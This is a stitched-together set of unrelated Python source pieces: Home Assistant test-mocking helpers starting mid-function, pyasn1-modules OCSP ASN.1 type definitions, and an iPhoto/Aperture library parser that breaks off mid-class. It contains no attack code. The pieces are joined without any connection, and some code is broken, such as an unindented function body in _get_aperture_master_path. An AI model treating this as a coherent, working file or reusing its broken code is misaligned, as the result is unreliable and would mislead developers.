    key = restore_state.DATA_RESTORE_STATE_TASK
    data = restore_state.RestoreStateData(hass)
    now = date_util.utcnow()

    data.last_states = {
        state.entity_id: restore_state.StoredState(state, now)
        for state in states}
    _LOGGER.debug('Restore cache: %s', data.last_states)
    # A shorter dict than the input means two states shared an entity_id.
    assert len(data.last_states) == len(states), \
        "Duplicate entity_id? {}".format(states)

    async def get_restore_state_data() -> restore_state.RestoreStateData:
        return data

    # Patch the singleton task in hass.data to return our new RestoreStateData
    hass.data[key] = hass.async_create_task(get_restore_state_data())
class MockDependency:
    """Decorator and context manager to mock-install a dependency.

    Patches sys.modules so that importing *root* (and any listed
    submodules) yields MagicMocks for the duration of the test.
    """

    def __init__(self, root, *args):
        """Initialize decorator.

        root: top-level module name to mock.
        args: dotted paths (relative to root) of submodules to mock too.
        """
        self.root = root
        self.submodules = args

    def __enter__(self):
        """Start mocking and return the root MagicMock."""
        def resolve(mock, path):
            """Walk attribute *path* down from *mock*."""
            if not path:
                return mock
            return resolve(getattr(mock, path[0]), path[1:])

        base = MagicMock()
        to_mock = {
            "{}.{}".format(self.root, tom): resolve(base, tom.split('.'))
            for tom in self.submodules
        }
        to_mock[self.root] = base

        self.patcher = patch.dict('sys.modules', to_mock)
        self.patcher.start()
        return base

    def __exit__(self, *exc):
        """Stop mocking sys.modules."""
        self.patcher.stop()
        return False

    def __call__(self, func):
        """Apply decorator; the mock root is appended as a last argument."""
        def run_mocked(*args, **kwargs):
            """Run with mocked dependencies."""
            with self as base:
                args = list(args) + [base]
                # Propagate the wrapped function's return value; the
                # original discarded it, silently breaking decorated
                # helpers that return a result.
                return func(*args, **kwargs)
        return run_mocked
class MockEntity(entity.Entity):
    """Mock Entity class.

    Property values are supplied via keyword arguments; anything not
    supplied falls back to the base Entity implementation.
    """

    def __init__(self, **values):
        """Initialize an entity."""
        self._values = values

        if 'entity_id' in values:
            self.entity_id = values['entity_id']

    @property
    def name(self):
        """Return the name of the entity."""
        return self._handle('name')

    @property
    def should_poll(self):
        """Return the state of the polling."""
        return self._handle('should_poll')

    @property
    def unique_id(self):
        """Return the unique ID of the entity."""
        return self._handle('unique_id')

    @property
    def available(self):
        """Return True if entity is available."""
        return self._handle('available')

    @property
    def device_info(self):
        """Info how it links to a device."""
        return self._handle('device_info')

    def _handle(self, attr):
        """Return the supplied value for *attr*, else the base class's."""
        if attr in self._values:
            return self._values[attr]
        # Fall through to entity.Entity's default property value.
        return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
    """Mock storage.

    Data is a dict {'key': {'version': version, 'data': data}}

    Written data will be converted to JSON to ensure JSON parsing works.
    """
    if data is None:
        data = {}

    orig_load = storage.Store._async_load

    async def mock_async_load(store):
        """Mock version of load."""
        if store._data is None:
            # No data to load
            if store.key not in data:
                return None

            mock_data = data.get(store.key)

            if 'data' not in mock_data or 'version' not in mock_data:
                _LOGGER.error('Mock data needs "version" and "data"')
                raise ValueError('Mock data needs "version" and "data"')

            store._data = mock_data

        # Route through original load so that we trigger migration
        loaded = await orig_load(store)
        _LOGGER.info('Loading data for %s: %s', store.key, loaded)
        return loaded

    def mock_write_data(store, path, data_to_write):
        """Mock version of write data."""
        _LOGGER.info('Writing data to %s: %s', store.key, data_to_write)
        # To ensure that the data can be serialized
        data[store.key] = json.loads(json.dumps(
            data_to_write, cls=store._encoder))

    # autospec=True makes the side_effect receive `store` as first arg.
    with patch('homeassistant.helpers.storage.Store._async_load',
               side_effect=mock_async_load, autospec=True), \
            patch('homeassistant.helpers.storage.Store._write_data',
                  side_effect=mock_write_data, autospec=True):
        yield data
async def flush_store(store):
    """Force any delayed write of *store* to happen immediately."""
    # A store that never buffered data has nothing pending.
    if store._data is not None:
        await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
    """Fetch the system health info for *domain* via its registered callback."""
    info_callback = hass.data['system_health']['info'][domain]
    return await info_callback(hass)
def mock_integration(hass, module):
    """Mock an integration.

    Registers *module* in both the integration and component caches.
    """
    # NOTE(review): 'homeassisant' looks like a typo of 'homeassistant'
    # in this package-path string — confirm before changing, it is a
    # runtime value.
    integration = loader.Integration(
        hass, 'homeassisant.components.{}'.format(module.DOMAIN), None,
        module.mock_manifest())

    _LOGGER.info("Adding mock integration: %s", module.DOMAIN)
    hass.data.setdefault(
        loader.DATA_INTEGRATIONS, {}
    )[module.DOMAIN] = integration
    hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
def mock_entity_platform(hass, platform_path, module):
    """Mock a entity platform.

    platform_path is in form light.hue. Will create platform
    hue.light.
    """
    domain, platform_name = platform_path.split('.')
    # NOTE(review): both caches below read DATA_COMPONENTS; mock_integration
    # populates DATA_INTEGRATIONS and DATA_COMPONENTS with the same keys, so
    # the membership test still works — confirm whether DATA_INTEGRATIONS
    # was intended for integration_cache.
    integration_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
    module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})

    if platform_name not in integration_cache:
        mock_integration(hass, MockModule(platform_name))

    _LOGGER.info("Adding mock integration platform: %s", platform_path)
    module_cache["{}.{}".format(platform_name, domain)] = module
|
|
#
# This file is part of pyasn1-modules software.
#
# Copyright (c) 2005-2018, Ilya Etingof <etingof@gmail.com>
# License: http://snmplabs.com/pyasn1/license.html
#
# OCSP request/response syntax
#
# Derived from a minimal OCSP library (RFC2560) code written by
# Bud P. Bruegger <bud@ancitel.it>
# Copyright: Ancitel, S.p.a, Rome, Italy
# License: BSD
#
#
# current limitations:
# * request and response works only for a single certificate
# * only some values are parsed out of the response
# * the request doesn't set a nonce or signature
# * there is no signature validation of the response
# * dates are left as strings in GeneralizedTime format -- datetime.datetime
# would be nicer
#
from pyasn1.type import namedtype
from pyasn1.type import namedval
from pyasn1.type import tag
from pyasn1.type import univ
from pyasn1.type import useful
from pyasn1_modules import rfc2459
# Start of OCSP module definitions
# This should be in directory Authentication Framework (X.509) module
class CRLReason(univ.Enumerated):
    """X.509 CRLReason: why a certificate was revoked (value 7 is unused)."""
    namedValues = namedval.NamedValues(
        ('unspecified', 0),
        ('keyCompromise', 1),
        ('cACompromise', 2),
        ('affiliationChanged', 3),
        ('superseded', 4),
        ('cessationOfOperation', 5),
        ('certificateHold', 6),
        ('removeFromCRL', 8),
        ('privilegeWithdrawn', 9),
        ('aACompromise', 10)
    )
# end of directory Authentication Framework (X.509) module
# This should be in PKIX Certificate Extensions module
class GeneralName(univ.OctetString):
    """Simplified stand-in for the X.509 GeneralName CHOICE.

    NOTE(review): modeled as an opaque OCTET STRING rather than the full
    RFC 5280 structure — presumably sufficient for this module's use.
    """
    pass
# end of PKIX Certificate Extensions module
# Object identifiers used by OCSP (1.3.6.1.5.5.7.48.1.*) and the
# OCSP-signing extended key usage (1.3.6.1.5.5.7.3.9).
id_kp_OCSPSigning = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 3, 9))
id_pkix_ocsp = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 48, 1))
id_pkix_ocsp_basic = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 48, 1, 1))
id_pkix_ocsp_nonce = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 48, 1, 2))
id_pkix_ocsp_crl = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 48, 1, 3))
id_pkix_ocsp_response = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 48, 1, 4))
id_pkix_ocsp_nocheck = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 48, 1, 5))
id_pkix_ocsp_archive_cutoff = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 48, 1, 6))
id_pkix_ocsp_service_locator = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 48, 1, 7))
class AcceptableResponses(univ.SequenceOf):
    """SEQUENCE OF OBJECT IDENTIFIER: response types a client accepts."""
    componentType = univ.ObjectIdentifier()


class ArchiveCutoff(useful.GeneralizedTime):
    """Archive cutoff time (OCSP extension)."""
    pass


class UnknownInfo(univ.Null):
    """Placeholder for the 'unknown' certificate status (NULL)."""
    pass
class RevokedInfo(univ.Sequence):
    """Revocation time and optional CRL reason for a revoked certificate."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('revocationTime', useful.GeneralizedTime()),
        namedtype.OptionalNamedType('revocationReason', CRLReason().subtype(
            explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)))
    )
class CertID(univ.Sequence):
    """Identifies a certificate by issuer hashes and serial number."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('hashAlgorithm', rfc2459.AlgorithmIdentifier()),
        namedtype.NamedType('issuerNameHash', univ.OctetString()),
        namedtype.NamedType('issuerKeyHash', univ.OctetString()),
        namedtype.NamedType('serialNumber', rfc2459.CertificateSerialNumber())
    )
class CertStatus(univ.Choice):
    """Certificate status CHOICE: good [0], revoked [1] or unknown [2]."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('good',
                            univ.Null().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
        namedtype.NamedType('revoked',
                            RevokedInfo().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
        namedtype.NamedType('unknown',
                            UnknownInfo().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2)))
    )
class SingleResponse(univ.Sequence):
    """Status answer for one certificate within a response."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('certID', CertID()),
        namedtype.NamedType('certStatus', CertStatus()),
        namedtype.NamedType('thisUpdate', useful.GeneralizedTime()),
        namedtype.OptionalNamedType('nextUpdate', useful.GeneralizedTime().subtype(
            explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
        namedtype.OptionalNamedType('singleExtensions', rfc2459.Extensions().subtype(
            explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1)))
    )
class KeyHash(univ.OctetString):
    """Hash of the responder's public key (used in ResponderID byKey)."""
    pass
class ResponderID(univ.Choice):
    """Identifies the responder by name [1] or by key hash [2]."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('byName',
                            rfc2459.Name().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
        namedtype.NamedType('byKey',
                            KeyHash().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2)))
    )
class Version(univ.Integer):
    """OCSP protocol version; only v1 (0) is defined."""
    namedValues = namedval.NamedValues(('v1', 0))
class ResponseData(univ.Sequence):
    """The to-be-signed body of a basic OCSP response."""
    componentType = namedtype.NamedTypes(
        namedtype.DefaultedNamedType('version', Version('v1').subtype(
            explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
        namedtype.NamedType('responderID', ResponderID()),
        namedtype.NamedType('producedAt', useful.GeneralizedTime()),
        namedtype.NamedType('responses', univ.SequenceOf(componentType=SingleResponse())),
        namedtype.OptionalNamedType('responseExtensions', rfc2459.Extensions().subtype(
            explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1)))
    )
class BasicOCSPResponse(univ.Sequence):
    """Signed ResponseData plus optional certificate chain."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('tbsResponseData', ResponseData()),
        namedtype.NamedType('signatureAlgorithm', rfc2459.AlgorithmIdentifier()),
        namedtype.NamedType('signature', univ.BitString()),
        namedtype.OptionalNamedType('certs', univ.SequenceOf(componentType=rfc2459.Certificate()).subtype(
            explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)))
    )
class ResponseBytes(univ.Sequence):
    """Response type OID plus DER-encoded response as an OCTET STRING."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('responseType', univ.ObjectIdentifier()),
        namedtype.NamedType('response', univ.OctetString())
    )
class OCSPResponseStatus(univ.Enumerated):
    """Top-level response status; value 4 is deliberately unused."""
    namedValues = namedval.NamedValues(
        ('successful', 0),
        ('malformedRequest', 1),
        ('internalError', 2),
        ('tryLater', 3),
        ('undefinedStatus', 4),  # should never occur
        ('sigRequired', 5),
        ('unauthorized', 6)
    )
class OCSPResponse(univ.Sequence):
    """Top-level OCSP response: status plus optional response bytes."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('responseStatus', OCSPResponseStatus()),
        namedtype.OptionalNamedType('responseBytes', ResponseBytes().subtype(
            explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)))
    )
class Request(univ.Sequence):
    """A single certificate status request entry."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('reqCert', CertID()),
        namedtype.OptionalNamedType('singleRequestExtensions', rfc2459.Extensions().subtype(
            explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)))
    )
class Signature(univ.Sequence):
    """Optional signature over a TBSRequest, with optional cert chain."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('signatureAlgorithm', rfc2459.AlgorithmIdentifier()),
        namedtype.NamedType('signature', univ.BitString()),
        namedtype.OptionalNamedType('certs', univ.SequenceOf(componentType=rfc2459.Certificate()).subtype(
            explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)))
    )
class TBSRequest(univ.Sequence):
    """The to-be-signed body of an OCSP request."""
    componentType = namedtype.NamedTypes(
        namedtype.DefaultedNamedType('version', Version('v1').subtype(
            explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
        namedtype.OptionalNamedType('requestorName', GeneralName().subtype(
            explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
        namedtype.NamedType('requestList', univ.SequenceOf(componentType=Request())),
        namedtype.OptionalNamedType('requestExtensions', rfc2459.Extensions().subtype(
            explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2)))
    )
class OCSPRequest(univ.Sequence):
    """Top-level OCSP request: TBSRequest plus optional signature."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('tbsRequest', TBSRequest()),
        namedtype.OptionalNamedType('optionalSignature', Signature().subtype(
            explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)))
    )
|
|
'''iPhoto database: reads iPhoto database and parses it into albums and images.
@author: tsporkert@gmail.com
This class reads iPhoto image, event, album information from the file
AlbumData.xml in the iPhoto library directory. That file is written by iPhoto
for the media browser in other applications. All data are
organized in the class IPhotoData. Images in iPhoto are grouped using events
(formerly knows as rolls) and albums. Each image is in exactly one event, and
optionally, in zero or more albums. Albums can be nested (folders). The album
types are:
Flagged - flagged pictures
Folder - contains other albums
Published - an album published to MobileMe
Regular - a regular user created album
SelectedEventAlbum - most recent album (as shown in iPhoto)
Shelf - list of flagged images
Smart - a user created smart album
SpecialMonth - "Last Month"
SpecialRoll - "Last Import"
Event - this type does not exist in the XML file, but we use it in this code
to allow us to treat events just like any other album
Face - Face album (does not exist in iPhoto, only in this code).
None - should not really happen
'''
# Original work Copyright 2010 Google Inc.
# Modified work Copyright 2014 Luke Hagan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modifications to original source by Luke Hagan:
#
# 2014-06-04: retrieve keywords from iPhoto database using sqlite;
# fix a bug in copying of originals
#
import datetime
import os
import re
import sys
import appledata.applexml as applexml
import tilutil.imageutils as imageutils
import tilutil.systemutils as su
# List of extensions for image formats that are considered JPEG.
_JPG_EXTENSIONS = ('jpg', 'jpeg')

# Convert Aperture numeric album types to iPhoto album type names.
# Keys are the numeric type codes as strings; the two name keys at the
# end patch up albums stored without an album type.
_APERTURE_ALBUM_TYPES = {
    '1': 'Regular',
    '2': 'Smart',
    '3': 'Special',
    '4': 'Event',
    '5': 'Library',
    '6': 'Folder',
    '8': 'Book',
    '9': 'WebPage',
    '10':'WebJournal',
    '11': 'LightTable',
    '13': 'SmartWebPage',
    '14': 'MobileMeAccount',
    '15': 'MobileMeAlbum',
    '16': 'FlickrAccount',
    '17': 'FlickrAlbum',
    '18': 'OnlineAccount',
    '19': 'Slideshow',
    '20': 'Published',
    # Patching up some albums that are stored with no album type.
    'Last Import': 'Special',
    'Recovered Photos': 'Special',
}
def parse_face_rectangle(string_data):
    """Parse a rectangle specification into an array of coordinate data.

    Args:
      string_data: Rectangle like '{{x, y}, {width, height}}'

    Returns:
      Array of x, y, width and height as floats. Falls back to a
      centered default rectangle if the input cannot be parsed.
    """
    try:
        return [float(entry.strip('{} ')) for entry in string_data.split(',')]
    except ValueError:
        # The original used the Python-2-only `print >> sys.stderr`
        # syntax; sys.stderr.write works on both Python 2 and 3.
        sys.stderr.write('Failed to parse rectangle ' + string_data + '\n')
        return [0.4, 0.4, 0.2, 0.2]
def _get_aperture_master_path(preview_path):
"""Given a path to a Aperture preview image, return the folder where the
Master would be stored if it is in the library."""
# Folder where preview image is stored.
folder = os.path.dirname(preview_path)
# Cut of the last folder in the path (see iphotodata_test.py for
# example).
folder = os.path.dirname(folder)
return folder.replace('/Previews/', '/Masters/', 1)
class IPhotoData(object):
    """Top level iPhoto data node.

    Call with the results of readAppleXML. Holds the master image list,
    keyword/face maps, albums and rolls (events) of a library.
    """

    def __init__(self, xml_data, xml_data2, ratings, is_aperture, aperture_data):
        self.data = xml_data
        self.data2 = xml_data2 if xml_data2 else xml_data
        self.aperture = is_aperture
        self.aperture_data = aperture_data
        self.albums = {}
        self.face_albums = None  # built lazily by getfacealbums()

        # Master map of keywords
        self.keywords = self.data.get("List of Keywords")

        self.face_names = {}  # Master map of faces
        face_list = self.data.get("List of Faces")
        if face_list:
            for face_entry in face_list.values():
                face_key = face_entry.get("key")
                face_name = face_entry.get("name")
                self.face_names[face_key] = face_name
                # Other keys in face_entry: image, key image face index,
                # PhotoCount, Order

        self.images_by_id = {}
        image_data = self.data.get("Master Image List")
        if image_data:
            for key in image_data:
                image = IPhotoImage(key, image_data.get(key), self.keywords,
                                    self.face_names, aperture_data)
                self.images_by_id[key] = image

        album_data = self.data2.get("List of Albums")
        self.root_album = IPhotoContainer("", "Root", None, None, None)
        for data in album_data:
            album = IPhotoAlbum(data, self.images_by_id, ratings, self.albums,
                                self.root_album, aperture_data)
            self.albums[album.albumid] = album

        self._rolls = {}
        if not self.aperture:
            roll_data = self.data2.get("List of Rolls")
            if roll_data:
                for roll in roll_data:
                    roll = IPhotoRoll(roll, self.images_by_id, ratings,
                                      aperture_data)
                    other_roll = self._rolls.get(roll.albumid)
                    if other_roll:
                        # iPhoto 9.1.2 issue: it splits rolls into many small
                        # rolls, each with a few images. We'll merge the images
                        # back together into a single roll.
                        other_roll.merge(roll)
                    else:
                        self._rolls[roll.albumid] = roll
                        self.root_album.addalbum(roll)

        # Lazily built name lookup tables (see _build_image_name_list).
        self.images_by_base_name = None
        self.images_by_file_name = None

    def _build_image_name_list(self):
        """Builds the by-base-name and by-file-name lookup maps."""
        self.images_by_base_name = {}
        self.images_by_file_name = {}
        # build the basename map
        for image in self.images_by_id.values():
            base_name = image.getbasename()
            other_images = self.images_by_base_name.get(base_name)
            if other_images is None:
                other_images = []
                self.images_by_base_name[base_name] = other_images
            other_images.append(image)

            imagename = image.getimagename()
            other_image_list = self.images_by_file_name.get(imagename)
            if other_image_list is None:
                other_image_list = []
                self.images_by_file_name[imagename] = other_image_list
            other_image_list.append(image)

    def _getapplicationversion(self):
        return self.data.get("Application Version")
    applicationVersion = property(_getapplicationversion, doc='iPhoto version')

    def _getimages(self):
        return self.images_by_id.values()
    images = property(_getimages, "List of images")

    def _getrolls(self):
        return self._rolls.values()
    rolls = property(_getrolls, "List of rolls (events)")

    def getroll(self, album_id):
        """Returns the roll (event) with the given id, or None."""
        return self._rolls.get(album_id)

    def getbaseimages(self, base_name):
        """returns an IPhotoImage list of all images with a matching base name.
        """
        if not self.images_by_base_name:
            self._build_image_name_list()
        return self.images_by_base_name.get(base_name)

    def getnamedimage(self, file_name):
        """returns an IPhotoImage for the given file name."""
        if not self.images_by_file_name:
            self._build_image_name_list()
        image_list = self.images_by_file_name.get(file_name)
        if image_list:
            return image_list[0]
        return None

    def getallimages(self):
        """returns map from full path name to image."""
        image_map = {}
        for image in self.images_by_id.values():
            # Fixed Java-port leftover: use getimagepath(), not GetImagePath().
            image_map[image.getimagepath()] = image
            image_map[image.thumbpath] = image
            if image.originalpath is not None:
                image_map[image.originalpath] = image
        return image_map

    def checkalbumsizes(self, max_size):
        """Prints a message for any event or album that has too many images."""
        messages = []
        for album in self._rolls.values():
            if album.size > max_size:
                messages.append("%s: event too large (%d)" % (album.name,
                                                              album.size))
        for album in self.albums.values():
            if album.albumtype == "Regular" and album.size > max_size:
                messages.append("%s: album too large (%d)" % (album.name,
                                                              album.size))
        messages.sort()
        for message in messages:
            print(message)

    def check_photos(self):
        """Attempts to verify that the data are not corrupt by checking the
        "Photos" album against the image list.
        """
        photos = None
        for album in self.albums.values():
            if album.master:
                photos = album
                break
        if not photos:
            su.pout("No Photos album in library.")
            return
        # Check size of Photos album vs. Master Image List
        if photos.size != len(self.images_by_id):
            su.pout("Warning: Master image list has %d images, but Photos album has %d images." % (
                len(self.images_by_id), photos.size))
        # Cross check Photos vs. Master Image List
        photos_ids = {}
        for photo in photos.images:
            # Make a map of Photos by id for the second phase below
            photos_ids[photo.id] = photo
            if photo.id not in self.images_by_id:
                su.pout("Warning: only in Photos album, but not in Master Image List: %s" % (
                    photo.caption))
                print(photo)
        for image in self.images:
            if image.id not in photos_ids:
                su.pout("Warning: only in Master Image List, but not in Photos album: %s" % (
                    image.caption))
                print(image)

    def load_aperture_originals(self):
        """Attempts to locate the original image files (Masters). Only works if
        the masters are stored in the library."""
        if not self.aperture or self.aperture_data:
            return
        su.pout('Scanning for Originals...')
        for image in self.images_by_id.values():
            image.find_aperture_original()

    def check_inalbums(self):
        """Checks that all images are in albums according to their events."""
        messages = []
        for image in self.images_by_id.values():
            # Fixed Java-port leftovers in this method: IsHidden() ->
            # ishidden(), GetAlbums() -> albums, GetAlbumType -> albumtype,
            # isSmart() -> albumtype == "Smart".
            if image.ishidden():
                continue
            roll_name = self._rolls[image.roll].name
            albums = []
            in_album = False
            for album in image.albums:
                album_name = album.name
                if album.albumtype == "Regular":
                    albums.append(album.name)
                    in_album = True
                    if album_name != roll_name:
                        messages.append(image.caption + ": in wrong album (" +
                                        roll_name + " vs. " + album_name + ").")
                elif (album.albumtype == "Smart" and
                      album_name.endswith(" Collection") or
                      album_name == "People" or album_name == "Unorganized"):
                    in_album = True
            if not in_album:
                messages.append(image.caption + ": not in any album.")
            # Only warn when the image really is in more than one album
            # (the original tested "if albums", firing for a single album).
            if len(albums) > 1:
                messages.append(image.caption + ": in more than one album: " +
                                " ".join(albums))
        messages.sort()
        for message in messages:
            print(message)

    def getfacealbums(self):
        """Returns a map of albums for faces."""
        if self.face_albums:
            return self.face_albums.values()
        # Build the albums on first call
        self.face_albums = {}
        for image in self.images:
            for face in image.getfaces():
                face_album = self.face_albums.get(face)
                if not face_album:
                    face_album = IPhotoFace(face)
                    self.face_albums[face] = face_album
                face_album.addimage(image)
        return self.face_albums.values()

    def print_summary(self):
        """Prints a one-line summary for each event and album, sorted by name."""
        named_rolls = {}
        for roll in self._rolls.values():
            named_rolls[roll.name] = roll
        for roll in sorted(named_rolls.keys()):
            named_rolls[roll].print_summary()
        named_albums = {}
        for album in self.albums.values():
            named_albums[album.name] = album
        for album in sorted(named_albums):
            named_albums[album].print_summary()
# Matches captions that start with a date prefix: "YYYYMMDD <rest>",
# with years 1000-2999 (used to recover a date from the caption).
_CAPTION_PATTERN = re.compile(
    r'([12][0-9][0-9][0-9])([01][0-9])([0123][0-9]) (.*)')
class IPhotoImage(object):
    """Describes an image in the iPhoto database."""

    def __init__(self, key, data, keyword_map, face_map, aperture_data):
        self.id = key
        self.data = data
        self._caption = su.nn_string(data.get("Caption")).strip()
        self.comment = su.nn_string(data.get("Comment")).strip()

        version = None
        if aperture_data:
            version = aperture_data.versions.get(key)

        if "DateAsTimerInterval" in data:
            self.date = applexml.getappletime(data.get("DateAsTimerInterval"))
        elif version:
            self.date = version.image_date
        else:
            # Try to get the date from the caption in "YYYYMMDD ..." format
            m = re.match(_CAPTION_PATTERN, self._caption)
            if m:
                year = int(m.group(1))
                month = int(m.group(2))
                if not month:
                    month = 1  # guard against "00" month in the caption
                date = int(m.group(3))
                if not date:
                    date = 1  # guard against "00" day in the caption
                self.date = datetime.datetime(year, month, date)
            else:
                self.date = None
        self.mod_date = applexml.getappletime(
            data.get("ModDateAsTimerInterval"))
        self.image_path = data.get("ImagePath")
        if "Rating" in data:
            self.rating = int(data.get("Rating"))
        elif version:
            self.rating = version.mainRating
        else:
            self.rating = None
        if data.get("longitude"):
            latitude = float(data.get("latitude"))
            longitude = float(data.get("longitude"))
            self.gps = imageutils.GpsLocation(latitude, longitude)
        elif version:
            self.gps = version.location
        else:
            self.gps = None
        self.keywords = []
        keyword_list = data.get("Keywords")
        if keyword_list is not None:
            for i in keyword_list:
                self.keywords.append(keyword_map.get(i))
        elif version:
            self.keywords = version.keywords

        if version:
            self.originalpath = None  # This is just a placeholder...
            # Use the preview if there are adjustments, a rotation, or a
            # non-JPEG master.
            if (version.rotation or version.hasAdjustments or
                    not su.getfileextension(version.master_image_path) in
                    _JPG_EXTENSIONS):
                self.originalpath = version.master_image_path
                if not version.imageProxy.fullSizePreviewPath:
                    su.pout(u"No preview path for %s." % (self.caption))
                else:
                    self.image_path = version.imageProxy.fullSizePreviewPath
            else:
                self.image_path = version.master_image_path
                self.originalpath = None
                if not version.imageProxy.fullSizePreviewUpToDate:
                    su.pout(u"%s: full size preview not up to date." % (
                        self.caption))
        else:
            self.originalpath = data.get("OriginalPath")
        self.roll = data.get("Roll")

        self.albums = []  # list of albums that this image belongs to
        self.faces = []
        self.face_rectangles = []
        self.event_name = ''  # name of event (roll) that this image belongs to
        self.event_index = ''  # index within event
        self.event_index0 = ''  # index with event, left padded with 0

        face_list = data.get("Faces")
        if face_list:
            for face_entry in face_list:
                face_key = face_entry.get("face key")
                face_name = face_map.get(face_key)
                if face_name:
                    self.faces.append(face_name)
                    # Rectangle is '{{x, y}, {width, height}}' as ratios,
                    # referencing the lower left corner of the face rectangle,
                    # with lower left corner of image as (0,0)
                    rectangle = parse_face_rectangle(
                        face_entry.get("rectangle"))
                    # Convert to using center of area, relative to upper left
                    # corner of image
                    rectangle[0] += rectangle[2] / 2.0
                    rectangle[1] = max(
                        0.0, 1.0 - rectangle[1] - rectangle[3] / 2.0)
                    self.face_rectangles.append(rectangle)
                # Other keys in face_entry: face index

            # Now sort the faces left to right, keyed by the rectangle's x
            # coordinate; duplicate x values get a tiny offset to stay unique.
            sorted_names = {}
            sorted_rectangles = {}
            for i in range(len(self.faces)):
                x = self.face_rectangles[i][0]
                while x in sorted_names:
                    x += 0.00001
                sorted_names[x] = self.faces[i]
                sorted_rectangles[x] = self.face_rectangles[i]
            self.faces = [sorted_names[x] for x in sorted(sorted_names.keys())]
            self.face_rectangles = [
                sorted_rectangles[x] for x in sorted(sorted_rectangles.keys())]

    def getimagepath(self):
        """Returns the full path to this image.."""
        return self.image_path

    def getimagename(self):
        """Returns the file name of this image.."""
        name = os.path.split(self.image_path)[1]
        return name

    def getbasename(self):
        """Returns the base name of the main image file."""
        return su.getfilebasename(self.image_path)

    def _getcaption(self):
        if not self._caption:
            return self.getimagename()
        return self._caption
    caption = property(_getcaption, doc="Caption (title) of the image")

    def ismovie(self):
        """Tests if this image is a movie."""
        return self.data.get("MediaType") == "Movie"

    def addalbum(self, album):
        """Adds an album to the list of albums for this image."""
        self.albums.append(album)

    def addface(self, name):
        """Adds a face (name) to the list of faces for this image."""
        self.faces.append(name)

    def getfaces(self):
        """Gets the list of face tags for this image."""
        return self.faces

    def ishidden(self):
        """Tests if the image is hidden (using keyword "Hidden")"""
        return "Hidden" in self.keywords

    def _getthumbpath(self):
        return self.data.get("ThumbPath")
    thumbpath = property(_getthumbpath, doc="Path to thumbnail image")

    def _getrotationisonlyedit(self):
        return self.data.get("RotationIsOnlyEdit")
    rotation_is_only_edit = property(_getrotationisonlyedit,
                                     doc="Rotation is only edit.")

    def _search_for_file(self, folder_path, basename):
        """Scans recursively through a folder tree and returns the path to the
        first file it finds that starts with "basename".
        """
        for file_name in su.os_listdir_unicode(folder_path):
            path = os.path.join(folder_path, file_name)
            if os.path.isdir(path):
                path = self._search_for_file(path, basename)
                if path:
                    return path
            elif file_name.startswith(basename):
                return path
        return None

    def find_aperture_original(self):
        """Attempts to locate the Aperture Master image. Works only for .jpg
        masters that are stored in the Aperture library. Saves the result as
        originalpath."""
        master_path = _get_aperture_master_path(self.image_path)
        if not os.path.exists(master_path):
            return
        basename = su.getfilebasename(self.image_path)
        file_name = os.path.join(master_path, basename + '.jpg')
        if os.path.exists(file_name):
            self.originalpath = file_name
            return
        path = self._search_for_file(master_path, basename + '.')
        if path:
            self.originalpath = path
            return
        su.pout(u"No master for %s" % (self.image_path))
class IPhotoContainer(object):
    """Base class for IPhotoAlbum and IPhotoRoll."""

    def __init__(self, name, albumtype, data, images, ratings,
                 aperture_data=None, verbose=False):
        self.name = name
        self._date = None
        self.uuid = None
        self.comment = None
        if data:
            if data.get("RollDateAsTimerInterval"):
                self._date = applexml.getappletime(
                    data.get("RollDateAsTimerInterval"))
            if data.get("uuid"):
                self.uuid = data.get("uuid")
